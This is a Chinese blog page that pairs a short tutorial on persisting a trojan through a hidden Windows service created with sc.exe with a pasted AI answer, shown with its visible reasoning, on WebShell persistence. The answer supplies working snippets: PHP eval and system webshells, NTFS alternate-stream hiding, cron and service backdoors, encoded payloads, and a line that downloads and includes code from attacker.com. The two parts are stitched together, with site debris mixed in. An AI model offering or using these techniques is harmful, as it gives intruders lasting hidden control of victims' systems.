SC实现隐藏Windows服务维持权限

简介:

sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用scPowershell程序来隐藏服务,搭到长期维持权限的效果。

创建服务

创建一个服务名为demo的自启动服务,服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行

sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem

添加个描述

sc description demo "tu3k.cn"

这时服务器重启会自启动上线,手动启动也可以上线,不过有时候手动可能会出错,但是不影响上线。

成功上线

删除进程命令sc delete demo

<
<think>好的,用户想了解WebShell的权限维持方法或技巧。首先,我需要回忆一下常见的WebShell权限维持技术。根据之前的引用内容,比如引用[1]提到了Linux的隐藏技术,引用[2]提到了权限维持隐藏技术,而引用[4]则涉及PHP的ADS文件包含。可能需要结合这些信息来组织答案。 首先,我应该分点回答,结构清晰。权限维持通常包括隐藏、持久化、混淆等方法。对于WebShell来说,常见的技巧可能包括文件隐藏、进程隐藏、定时任务、数据库存储等。 然后,引用中的例子,比如ADS(Alternate Data Streams)在Windows中的使用,如引用[4]提到的PHP包含ADS文件,这可以用来隐藏WebShell。此外,Linux下的隐藏技术如修改文件属性或使用隐藏目录,如引用[1]提到的执行命令隐藏进程或文件。 另外,持久化方法可能包括添加启动项、cron作业、或者服务,如引用[3]提到的Windows中的DLL劫持或服务重启。对于WebShell,可能还会利用数据库存储恶意代码,或者利用框架的特性来维持权限。 需要确保每个技术点都有相应的引用支持,比如文件隐藏部分引用[4]和[1],进程隐藏引用[1]和[2],持久化引用[3]和[2]。同时,要提供具体的例子,比如PHP的include用法,或者Linux的touch .test.php隐藏文件。 此外,用户可能需要了解如何检测和防范这些技术,所以相关问题可以涉及检测方法和防御措施。要确保回答覆盖不同操作系统,如Linux和Windows,并区分不同的Web语言,如PHP、ASP等。 最后,检查是否符合格式要求,使用正确的LaTeX,没有数学公式所以可能不需要,但如果有变量或代码,要用代码块。同时生成的相关问题要围绕WebShell权限维持的扩展,比如具体技术细节、检测方法、跨平台差异等。</think>### WebShell权限维持方法与技巧 WebShell权限维持技术旨在通过隐藏、持久化和混淆等手段,确保攻击者长期控制受感染系统。以下是常见方法分类及实例说明: --- #### 一、文件隐藏技术 1. **Alternate Data Streams (ADS)** 在Windows系统中,利用NTFS文件系统的ADS特性隐藏WebShell内容。例如将恶意代码附加到正常文件中: ```cmd echo "<?php @eval($_POST['cmd']);?>" > index.php:hidden.jpg ``` 通过PHP包含该ADS文件即可执行恶意代码: ```php <?php include('index.php:hidden.jpg'); ?> // 引用[4] ``` 2. **隐藏文件/目录** - **Linux**:以`.`开头的文件或目录默认隐藏,例如: ```bash touch .webshell.php // 引用[1] ``` - **Windows**:通过设置文件属性隐藏: ```cmd attrib +h webshell.php ``` --- #### 二、持久化机制 1. **定时任务(Cron Jobs)** 在Linux中通过Cron定时访问WebShell以维持活跃状态: ```bash crontab -e * * * * * curl http://target.com/webshell.php >/dev/null 2>&1 // 引用[2] ``` 2. **服务/启动项注入** - **Windows**:通过注册表或服务加载恶意DLL: ```cmd sc create BackdoorService binPath= "C:\malware.dll" start= auto // 引用[3] ``` - **Linux**:修改`/etc/rc.local`或Systemd服务文件实现自启动。 3. **数据库存储** 将WebShell代码写入数据库字段,通过动态加载执行: ```sql UPDATE wp_posts SET post_content = '<?php system($_GET["cmd"]);?>' WHERE ID = 1; ``` --- #### 三、混淆与反检测 1. **代码编码/加密** 使用Base64、Gzip或自定义加密算法混淆WebShell代码: ```php <?php eval(gzinflate(base64_decode('...'))); ?> ``` 2. **动态加载技术** 通过外部资源远程加载恶意代码,降低静态检测概率: ```php <?php file_put_contents('tmp.php', file_get_contents('http://attacker.com/payload.txt')); include('tmp.php'); ?> ``` --- #### 四、进程/网络隐藏 1. **进程伪装** 修改进程名为常见系统进程(如`apache2`或`nginx`)以逃避检测[^2]。 2. **端口复用** 复用Web服务器端口(如80/443)进行通信,避免触发防火墙告警。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巡安似海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值